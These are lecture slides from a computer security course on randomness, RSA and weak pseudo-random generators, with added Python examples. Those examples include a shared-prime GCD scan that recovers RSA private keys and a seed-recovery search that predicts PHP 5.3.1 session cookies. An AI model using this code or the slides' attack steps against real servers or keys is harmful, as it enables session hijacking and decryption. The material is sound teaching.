Computer Security 2014 – Ymir Vigfusson Some slides borrowed from Luis von Ahn‘s 15-251 class @...

Post on 12-Jan-2016


On randomness
Computer Security 2014 – Ymir Vigfusson

Some slides borrowed from Luis von Ahn's 15-251 class @ CMU

Plan for today

Suppose we want to communicate securely when an adversary can intercept us and do MITM attacks. Think back to the problem the Enigma tried to solve.

We've learned that the one-time pad is secure
▪ But we cannot practically exchange keys that long

Issue: Machines are inherently deterministic
▪ The strength of an encryption scheme is at best as good as its key
▪ The building block of modern encryption is randomness

We will learn how this is done today, assuming we have random numbers at our disposal: the famous RSA protocol

Plan for today

Part 1: Assuming we have random numbers, how can we do secure message exchange? That is, how does RSA work?

Part 2: But how can we create random numbers? Computers make do with pseudo-random numbers

Part 3: Pitfalls of pseudo-random number generators (PRNGs)
▪ PHP session IDs
▪ Various Internet attacks (including on RSA)

How do you compute 5^8 using few multiplications?

First idea: compute 5, 5^2, 5^3, 5^4, 5^5, 5^6, 5^7, 5^8 one at a time
  5^2 = 5*5, 5^3 = 5^2*5, ..., 5^8 = 5^7*5
  (7 multiplications)

Better idea: compute only 5, 5^2, 5^4, 5^8
  5^2 = 5*5, 5^4 = 5^2*5^2, 5^8 = 5^4*5^4
  Used only 3 mults instead of 7!!!

Repeated squaring calculates a^(2^k) in k multiply operations; compare with the (2^k - 1) multiply operations used by the naive method.

How do you compute 5^13?

Use repeated squaring again? 5, 5^2, 5^4, 5^8, 5^16 ... too high! What now? (Assume no divisions allowed.)

Note that 13 = 8 + 4 + 1, so a^13 = a^8 * a^4 * a^1: two more multiplies on top of the three squarings. In binary, 13_10 = (1101)_2: one set bit per power that gets multiplied in.

To compute a^m in general:

Suppose 2^k ≤ m < 2^(k+1). Compute a, a^2, a^4, a^8, ..., a^(2^k) by repeated squaring. This takes k multiplies.

Now write m as a sum of distinct powers of 2, say m = 2^k + 2^i1 + 2^i2 + ... + 2^it. Then

  a^m = a^(2^k) * a^(2^i1) * ... * a^(2^it)

which is at most k more multiplies.

Hence we can compute a^m (mod n) while performing at most 2 log2 m multiplies, where each time we multiply together numbers with log2 n + 1 bits.

How do you compute 5^13 (mod 11)?

First idea: compute 5^13 using 5 multiplies
  5, 5^2, 5^4, 5^8, 5^12 = 5^8*5^4, 5^13 = 5^12*5
  = 1 220 703 125
then take the answer mod 11:
  1220703125 (mod 11) = 4

Better idea: keep reducing the answer mod 11 after every multiply, so no intermediate product ever exceeds 11^2
  5            = 5  (mod 11)
  5^2  = 25    = 3  (mod 11)
  5^4  = 3*3   = 9  (mod 11)
  5^8  = 9*9   = 81 = 4 (mod 11)
  5^12 = 4*9   = 36 = 3 (mod 11)
  5^13 = 3*5   = 15 = 4 (mod 11)

Pretty good! We'll come back to this in a bit.

Now, recall the following:

Z_n = {0, 1, 2, ..., n-1}

Z_n* = {x ∈ Z_n | GCD(x, n) = 1}

Examples:
  Z_8* = {1, 3, 5, 7}
  Z_11* = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10}

Euler Phi Function Φ(n)

Φ(n) = size of Z_n*

p prime: Φ(p) = p-1

p, q distinct primes: Φ(pq) = (p-1)(q-1)

How do you compute 5^121242653 (mod 11)?

The current best idea (repeated squaring with reduction mod 11) would still need about 54 calculations. Answer = 4.

We can actually do better using Φ(n), and importantly we can do this fast:

  for a ∈ Z_n*, a^x ≡ a^(x mod Φ(n)) (mod n)

This follows from Euler's Theorem:

  For a ∈ Z_n*, a^Φ(n) = 1 (mod n)

Corollary: Fermat's Little Theorem

  For p prime, a ∈ Z_p*: a^(p-1) = 1 (mod p)

Here 121242653 mod Φ(11) = 121242653 mod 10 = 3, so 5^121242653 ≡ 5^3 = 125 ≡ 4 (mod 11).

Key result needed, and the key to RSA.

RSA algorithm

Key generation (by the receiver):
  Pick secret, random large primes p, q. Multiply n = p*q. "Publish": n
  Φ(n) = Φ(p)Φ(q) = (p-1)*(q-1). Pick random e ∈ Z*_Φ(n). "Publish": e
  Compute d = inverse of e in Z*_Φ(n), hence e*d = 1 [mod Φ(n)]. "Private key": d

The exchange:
  Receiver (holds p, q random primes; e random in Z*_Φ(n); n = p*q; e*d = 1 [mod Φ(n)]):
    "n, e is my public key. Use it to send me a message."   --> publishes n, e
  Sender (knows only n, e; has message m):
    sends c = m^e [mod n]
  Receiver:
    computes c^d = (m^e)^d ≡ m [mod n]

Why does (m^e)^d ≡ m [mod n]? Since e*d = 1 [mod Φ(n)], e*d = 1 + k*Φ(n) for some k, so (m^e)^d = m^(1 + k*Φ(n)) = m * (m^Φ(n))^k ≡ m * 1^k = m by Euler's Theorem (for m ∈ Z_n*).

Example: p = 11, q = 3 primes, e = 3
  n = p*q = 33, Φ(n) = 10*2 = 20, gcd(3, 20) = 1 so e ∈ Z*_20
  d = ? Need 3*d = 1 [mod 20]: d = 7 (3*7 = 21 = 1 [mod 20])
  message m = 7
  c = ? c = 7^3 = 343 = 13 [mod 33]
  decrypt: 13^7 = 7 [mod 33]
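The repeated-squaring procedure from the previous slides and the RSA example above, carried through in code. This is an added example for this lecture, not code from the slides or from any RSA implementation; the multiplication counter in modexp() and the toy parameters (p=11, q=3, e=3, m=7) are the slides' own, everything else is illustrative.

```python
# Added example (not from the slides): square-and-multiply exponentiation with
# reduction mod n at every step, exponent reduction via Euler's theorem, and
# textbook RSA run on the slides' toy parameters (p=11, q=3, e=3, m=7).
from math import gcd


def modexp(a, m, n):
    """Return (a^m mod n, number of multiplications used).

    Scans the bits of m from the least significant end. Squaring produces
    a, a^2, a^4, ... (mod n); a multiply folds in a^(2^i) for each set bit i,
    i.e. m = 2^k + 2^i1 + ... as on the slides. Reducing mod n after every
    product keeps every operand at log2(n)+1 bits.
    """
    result, base, mults = None, a % n, 0
    while m > 0:
        if m & 1:
            if result is None:
                result = base                 # first set bit: nothing to multiply yet
            else:
                result = (result * base) % n
                mults += 1
        m >>= 1
        if m:                                  # no squaring needed after the top bit
            base = (base * base) % n
            mults += 1
    return (1 % n if result is None else result), mults


def modexp_euler(a, m, n, phi):
    """For gcd(a, n) = 1, a^m ≡ a^(m mod Φ(n)) (mod n) by Euler's theorem."""
    if gcd(a, n) != 1:
        raise ValueError("Euler's theorem needs a in Z_n*")
    return modexp(a, m % phi, n)


def modinv(e, phi):
    """Inverse of e in Z_phi* by the extended Euclidean algorithm: e*d ≡ 1 (mod phi)."""
    old_r, r, old_s, s = e, phi, 1, 0
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
    if old_r != 1:
        raise ValueError("e is not invertible: gcd(e, phi) != 1")
    return old_s % phi


def rsa_keygen(p, q, e):
    """Textbook RSA key generation: returns ((n, e), d) with e*d ≡ 1 (mod Φ(n))."""
    n, phi = p * q, (p - 1) * (q - 1)
    return (n, e), modinv(e, phi)              # modinv rejects e outside Z*_Φ(n)


def rsa_encrypt(pub, m):
    n, e = pub
    return modexp(m, e, n)[0]                  # c = m^e mod n


def rsa_decrypt(n, d, c):
    return modexp(c, d, n)[0]                  # (m^e)^d = m^(1 + kΦ(n)) ≡ m mod n


if __name__ == "__main__":
    print("5^8 needs", modexp(5, 8, 10**9)[1], "multiplies")            # 3
    print("5^13 mod 11 =", modexp(5, 13, 11))                             # (4, 5)
    print("5^121242653 mod 11 by repeated squaring:", modexp(5, 121242653, 11))
    print("... via Euler (Φ(11) = 10):", modexp_euler(5, 121242653, 11, 10))
    pub, d = rsa_keygen(11, 3, 3)
    c = rsa_encrypt(pub, 7)
    print("n,e =", pub, "d =", d, "c =", c, "decrypted =", rsa_decrypt(pub[0], d, c))
```

The multiplication counts match the slides (3 for 5^8, 5 for 5^13, 37 instead of "about 54" for the big exponent because only 12 of its 27 bits are set), and the Euler shortcut brings the big exponent down to 2 multiplies. Textbook RSA as shown is deterministic and unpadded; real deployments add OAEP or similar padding, which this example deliberately leaves out.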

How hard is cracking RSA?

If we can factor products of two large primes, can we crack RSA?

If we know n and Φ(n), can we crack RSA?

How about the other way? Does cracking RSA mean we must do one of these two?

We don’t know (yet)…


Part 2: Can we create random numbers?

RSA relies fundamentally on the availability of random numbers: random primes p and q, and random exponent e

However, computers by themselves cannot generate random numbers! They are, as we said before, fundamentally deterministic
▪ Need external sources, and to use those sparingly

Khan Academy has a nice introduction to the topic:
https://www.khanacademy.org/computing/computer-science/cryptography/crypt/v/random-vs-pseudorandom-number-generators

How do we create random numbers?

You could buy an exciting book!
http://www.amazon.com/Million-Random-Digits-Normal-Deviates/dp/0833030477

You could hook up a Lava lamp!

... or a Geiger counter

Not terribly practical!

How do we create random numbers?

In practice we use pseudo-random number generators (PRNGs)
▪ Rely on external sources for initial randomness (a small amount of true randomness seeds the generator, which then stretches it deterministically)

Here is the diagram for the Linux PRNGs:
[diagram of the Linux PRNG (PDF figure) not reproduced in this transcript]

Part 3: Weaknesses in PRNGs

In 2012, two research groups looked at gcd(n1, n2) for RSA public keys on the Internet (e.g. SSL/SSH)
▪ If any pair of keys share a prime, easy to crack! gcd(n1, n2) is the shared prime p, then q = n/p, Φ(n) and d follow immediately

A wide range of devices (routers, firewalls, VPN...) had these weak keys
▪ Too little entropy on the devices to generate strong keys (keys generated right after boot, before the entropy pool had anything in it)
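The shared-prime check described above, as an added example for this lecture (not code from the 2012 studies). It runs the gcd scan over a constructed set of four toy moduli, two of which reuse a prime as a low-entropy device would, and then recovers the private exponent for each weak key. The product-based shortcut and its fallback are the practitioner's version of "look at gcd(n1, n2) for every pair"; the primes, moduli and exponent are constructed.

```python
# Added example (not from the slides or the 2012 papers): the shared-prime check the
# 2012 GCD scans ran over Internet-wide RSA key collections, on a constructed set of
# toy moduli. Everything below is illustrative code for this lecture, not tooling
# from those studies.
from math import gcd, prod


def shared_factor_scan(moduli):
    """Return {n: (p, q)} for every modulus that shares a prime with another one.

    Pairwise gcd over k keys costs k^2 gcds. Instead, with P = product of all
    moduli, (P mod n^2) // n equals (product of all the *other* moduli) mod n, so
    gcd(n, that) is whatever n shares with the rest: one gcd per key.
    Caveat: if n shares *both* its primes (with different partners) the gcd is n
    itself and tells us nothing, so we fall back to pairwise gcd for that key.
    """
    P = prod(moduli)
    weak = {}
    for n in moduli:
        g = gcd(n, (P % (n * n)) // n)
        if g == 1:
            continue                                   # shares nothing: looks fine
        if g == n:                                     # both primes shared, or a duplicate key
            g = next((gcd(n, o) for o in moduli if o != n and 1 < gcd(n, o) < n), None)
            if g is None:
                continue                               # only exact duplicates present
        weak[n] = tuple(sorted((g, n // g)))
    return weak


def recover_private_exponent(n, p, q, e):
    """With n factored, Φ(n) and hence d = e^-1 mod Φ(n) follow immediately."""
    assert p * q == n
    return pow(e, -1, (p - 1) * (q - 1))               # Python 3.8+: modular inverse


# Constructed toy "Internet scan": four 12-bit moduli, two primes reused as a
# low-entropy device would. Real keys are 1024-2048 bits; the arithmetic is identical.
TOY_MODULI = [61 * 53, 61 * 67, 71 * 73, 53 * 79]      # 3233, 4087, 5183, 4187
E = 65537

if __name__ == "__main__":
    for n, (p, q) in shared_factor_scan(TOY_MODULI).items():
        d = recover_private_exponent(n, p, q, E)
        print(f"n={n} factors as {p}*{q}; private exponent d={d}")
```

The modulus 3233 shares one prime with 4087 and the other with 4187, which is exactly the case where the one-gcd-per-key shortcut returns n itself; the fallback resolves it. The check is cheap enough to run over every certificate you hold, and a hit means the key was never secret in the first place, not that it was stolen.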

Weaknesses in PRNGs

Dual_EC_DRBG NSA backdoor
▪ PRNG designed in the 2000s based on elliptic curves. Makes use of some magic values P and Q.
▪ Shown in 2007 that if someone deliberately created these values (knowing the relation between P and Q), they could recover the generator's state, and hence decrypt traffic, after seeing only 32 random bytes of output
▪ RSA adopts Dual_EC_DRBG as default in BSAFE in 2004. Not used by OpenSSL and others, however.
▪ Standardized by NIST in 2005
▪ Snowden's leaks in 2013 reveal NSA placed a backdoor: "NSA became the only editor of the standard"; NSA paid $10m to RSA to have the company use it as a default
▪ Presidential advisory committee investigating NSA's conduct

Lesson: insist on "nothing up my sleeve numbers" for such constants

Internet Cookies

A user spends effort logging into syndis.is

The web server could require log-in information in each following packet to ensure credentials. Cumbersome and expensive.

Instead, syndis.is hands out a temporary "badge" (cookie) to the user
▪ User submits a copy of the cookie on every request
▪ Doesn't matter if the user gets a new IP address, nice!

What if badges were numbered 1, 2, 3, ...? Anyone could present the next number and be treated as the next user to log in. Need to have cookie strings unpredictable!

PHP 5.3.1 Session ID generation

From php-5.3.1/ext/session/session.c:

    PHPAPI char *php_session_create_id(PS_CREATE_SID_ARGS)
    {
        …
        gettimeofday(&tv, NULL);
        …
        /* maximum 15+19+19+10 bytes */
        spprintf(&buf, 0, "%.15s%ld%ld%0.8F",
                 remote_addr,              /* client IP address, at most 15 chars   */
                 tv.tv_sec,                /* seconds since the epoch               */
                 (long int)tv.tv_usec,     /* microseconds, 0..999999               */
                 php_combined_lcg() * 10); /* LCG output in [0,10), 8 decimals      */
        …
        return buf;
    }

How much entropy?

  Variable                                   Entropy
  Client IP address (4 bytes)                32 bits
  Current epoch (seconds)                    32 bits
  Current microseconds (0-1,000,000)        <20 bits
  Random value from php_combined_lcg()       64 bits
  Total                                     148 bits

Let's dissect the components

Can we guess the current epoch (the tv_sec field)?

Session IDs are normally generated when someone logs in
▪ On social networking sites, the user appears to be visible: on Facebook and Gmail a dot turns green, "Who's logged on" is updated
▪ Can find the offset of our time vs. server time using an HTTP HEAD request:

  HEAD / HTTP/1.0

  HTTP/1.1 200 OK
  Date: Mon, 12 Jul 2010 04:30:45 GMT
  Server: Apache/2.2.3 (CentOS)
  Last-Modified: Sat, 15 May 2010 00:50:56 GMT
  ETag: "d664e-66-6267dc00"
  Accept-Ranges: bytes
  Content-Length: 102
  Connection: close
  Content-Type: text/html; Charset=UTF-8

Let's dissect the components

Can we find the victim's IP address?
▪ Attacker may already know the address, e.g. victim behind a common proxy, such as proxy.emory.edu
▪ Can lure the victim into clicking a link and obtain the IP address (could even do something more nefarious)

So we can usually know the IP address

What do we have?

We started with 148 bits (prehashed). We know 64 of these bits (IP address and epoch), so 84 bits remain.

Still a feat to crack...

What about the remaining session ID components?

How much entropy?

  Variable                                   Entropy    Status
  Client IP address (4 bytes)                32 bits    known
  Current epoch (seconds)                    32 bits    known
  Current microseconds (0-1,000,000)        <20 bits    unknown
  Random value from php_combined_lcg()       64 bits    unknown
  Total remaining                            84 bits

Dissecting the PRNG

php_combined_lcg() uses an LCG (Linear Congruential Generator), a standard PRNG:

    /* MODMULT(a, b, c, m, s) is a macro defined alongside this function (not
       shown on the slide); it updates s to b*s mod m without overflow
       using Schrage's method, with m = a*b + c. */
    PHPAPI double php_combined_lcg(void)
    {
        php_int32 q, z;

        if (!LCG(seeded)) {
            lcg_seed();                 /* first call: seed from time and pid */
        }

        MODMULT(53668, 40014, 12211, 2147483563L, LCG(s1));   /* step generator 1 */
        MODMULT(52774, 40692, 3791, 2147483399L, LCG(s2));    /* step generator 2 */

        z = LCG(s1) - LCG(s2);          /* combine the two streams */
        if (z < 1) {
            z += 2147483562;
        }
        return z * 4.656613e-10;        /* scale into (0, 1) */
    }

    static void lcg_seed(void)
    {
        struct timeval tv;

        if (gettimeofday(&tv, NULL) == 0) {
            LCG(s1) = tv.tv_sec ^ (~tv.tv_usec);   /* seconds XOR complemented microseconds */
        } else {
            LCG(s1) = 1;
        }
        LCG(s2) = (long) getpid();                 /* process ID */
        LCG(seeded) = 1;
    }

Pids on UNIX are usually 15 bits. Could maybe even find it out...

What's going on here?

Timestamp manipulation

LCG(s1) = tv.tv_sec ^ (~tv.tv_usec);

  tv.tv_sec     1100111001000010110000110010101   high bits most certain, low bits most uncertain
  ~tv.tv_usec   1111111111110111010010101110010   tv_usec < 2^20, so every high bit of its complement is 1
  XOR         = 0011000110110101100010011100111

The high bits of s1 are just the complement of the known high bits of tv_sec; the unknown microseconds only affect the low ~20 bits. The timestamp provides only 20 bits of entropy!

Dissecting the PRNG

We have narrowed down the internal state of the random number generator (LCG) to 15 + 20 bits: specifically the variables s2 (the pid, 15 bits) and s1 (the timestamp, 20 bits).

How do we make use of this information?

Recall php_session_create_id() from PHP 5.3.1 (shown above): the pre-hash session ID string is remote_addr, tv.tv_sec, tv.tv_usec and php_combined_lcg() * 10 printed with 8 decimals.

Dissecting the PRNG

We just create a session by ourselves! A part of our (pre-hash) session ID will be the current value of php_combined_lcg()

We can then brute force the value that lcg_seed() produced initially
▪ We thus know the values of s1 and s2
▪ In other words, we know what php_combined_lcg() will return before it does!

Important: We calculate the PRNG state locally. No need to send requests to the server

How much is left for each session?

  Variable                                   Entropy    Status
  Client IP address (4 bytes)                32 bits    known
  Current epoch (seconds)                    32 bits    known
  Current microseconds (0-1,000,000)        <20 bits    unknown
  Random value from php_combined_lcg()       64 bits    known (predicted from recovered s1, s2)
  Total remaining                            20 bits

PHP attack, summary

The session ID in PHP 5.3.1 has four components:

Client IP address: known by attacker
Timestamp in seconds: known by attacker
Microseconds: unknown
▪ Must brute-force these ~20 bits with individual packets (one request per guess)
PRNG output: known once the generator state is recovered
▪ We create a new session to see the next value of php_combined_lcg()
▪ We brute-force the seed used offline. Only (20+15) bits actually needed because of a bug (the tv_sec ^ ~tv_usec seeding leaves only 20 bits of entropy in s1)
▪ We determine how many sessions have been opened on the server to make a good guess of how many times the LCG has advanced since seeding
▪ Only need to do this once between PHP restarts!

We could predict future session cookies... pretty bad!
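The offline part of the attack (the seed search over s1 and s2, and the prediction of the next session's LCG field), as an added example for this lecture. The generator is a Python model of php_combined_lcg()/lcg_seed() as printed on the slides, not PHP's own code; it assumes php_int32 state, a non-ZTS build so that s2 = getpid(), C integer semantics emulated by c_div()/to_int32(), and, as the slides do, that the LCG field of the pre-hash session ID is observable. tv_sec is the slide's Date header; the pid, microseconds and search windows are constructed.

```python
# Added example (not PHP's code and not from the slides): a Python model of
# php_combined_lcg() and lcg_seed() as shown above, used to run the offline seed
# search the attack relies on. Assumptions made here: php_int32 state, a non-ZTS
# build (s2 = getpid()), C integer semantics emulated by c_div()/to_int32(), and
# the LCG field of the pre-hash session ID treated as directly observable (the
# slides' simplification; with the ID hashed, the same search is run against the
# hash with the other three fields filled in).

M1, M2 = 2147483563, 2147483399              # moduli of the two LCG components


def to_int32(x):
    """Truncate to a signed 32-bit value, as storing into a php_int32 does."""
    return ((x + 2**31) & 0xFFFFFFFF) - 2**31


def c_div(a, b):
    """C integer division truncates toward zero; Python's // floors."""
    q = abs(a) // abs(b)
    return q if (a < 0) == (b < 0) else -q


def modmult(a, b, c, m, s):
    """MODMULT(a,b,c,m,s) from lcg.c: s = b*s mod m by Schrage's method (m = a*b + c)."""
    q = c_div(s, a)
    s = b * (s - a * q) - c * q
    if s < 0:
        s += m
    return s


class CombinedLCG:
    """State (s1, s2) of php_combined_lcg(); next() returns the same double it would."""

    def __init__(self, s1, s2):
        self.s1, self.s2 = to_int32(s1), to_int32(s2)

    @classmethod
    def seeded(cls, tv_sec, tv_usec, pid):
        return cls(tv_sec ^ ~tv_usec, pid)   # lcg_seed(): s1 = sec ^ ~usec, s2 = pid

    def next(self):
        self.s1 = modmult(53668, 40014, 12211, M1, self.s1)
        self.s2 = modmult(52774, 40692, 3791, M2, self.s2)
        z = self.s1 - self.s2
        if z < 1:
            z += 2147483562
        return z * 4.656613e-10


def lcg_field(lcg):
    """Last field of the PHP 5.3.1 pre-hash session ID: "%0.8F" of php_combined_lcg()*10."""
    return f"{lcg.next() * 10:.8f}"


def recover_state(observed, tv_sec, usec_range, pid_range, max_calls=1):
    """Offline search over the ~20 unknown usec bits and ~15 pid bits of the seed.

    tv_sec is taken as known (HTTP Date header). `observed` lists the LCG fields
    the attacker saw in consecutive sessions of their own. The generator may already
    have been stepped once per session created since PHP started, so each candidate
    seed is advanced up to max_calls times. Returns a CombinedLCG positioned right
    after the last observed output (so next() predicts the next session), or None.
    """
    for pid in pid_range:
        for usec in usec_range:
            lcg = CombinedLCG.seeded(tv_sec, usec, pid)
            for _ in range(max_calls):
                if lcg_field(lcg) == observed[0]:
                    probe = CombinedLCG(lcg.s1, lcg.s2)
                    if all(lcg_field(probe) == o for o in observed[1:]):
                        return probe
    return None


if __name__ == "__main__":
    # Constructed server: seeded at the slide's Date header second, with a pid and
    # microseconds the attacker does not know; one other user's session came first.
    server = CombinedLCG.seeded(1278909045, 123456, 4321)
    lcg_field(server)
    seen = [lcg_field(server), lcg_field(server)]     # two sessions we created
    found = recover_state(seen, 1278909045, range(123000, 123600), range(4300, 4350), 3)
    print("recovered state:", (found.s1, found.s2) == (server.s1, server.s2))
    print("next session's LCG field:", lcg_field(found), "actual:", lcg_field(server))
```

The demo narrows the search windows so it runs in well under a second; the real attack iterates pid over 1..2^15 and usec over 0..10^6, about 2^35 seeds, which is a modest offline job and, as the slides say, only needs doing once per PHP restart. Matching two consecutive observed fields rather than one rules out accidental collisions on an 8-decimal value. The fix is the obvious one: session identifiers must come from a cryptographically secure generator seeded by the OS (getrandom(2) / os.urandom), never from an LCG seeded with time and pid.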

Optional lab: Blackjack! (+5%)

We've put information in "blackjack.login" in your home directory

Goal: Win $10,000,000 credits! You start off with $10,000

Standard blackjack rules. Grade is min(10, credits / 10M)
▪ You get one free refill (delaying inevitable gambler's ruin)

Information and scoreboard: http://hhg.to/blackjack.php